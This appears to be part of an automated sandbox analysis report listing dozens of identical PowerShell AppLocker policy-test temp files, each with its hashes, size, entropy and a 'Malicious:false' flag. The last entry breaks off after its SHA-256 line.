                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_altn0ipf.ppy.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avel1eng.ced.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bzf5cssu.2ee.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cjidnn4y.zqo.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cl15igbx.sdw.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cski1shy.zqi.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyvqwwzr.mbt.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_de3ghn3k.opd.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpaqo4co.xej.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzrlzd02.nuk.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_efsmvwnk.b24.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emu3mfla.vpd.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvj1bn4w.la5.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gcndar1a.uiy.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iiid3mie.1yw.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_irjnzhle.qfs.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jv2itbye.po4.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqesg023.zcl.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krdsigau.5ba.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ks00dfdb.bjs.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mb1jqbuh.dmj.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mb53cewe.w3g.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mki5ummv.w2t.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvad0kdk.fnr.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1uv3d3z.df0.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfctduk2.mkx.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqjigm1z.qat.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_omal02yi.weh.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozond0to.rs0.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfyxfyxg.5nf.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqj0qdmh.wa2.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
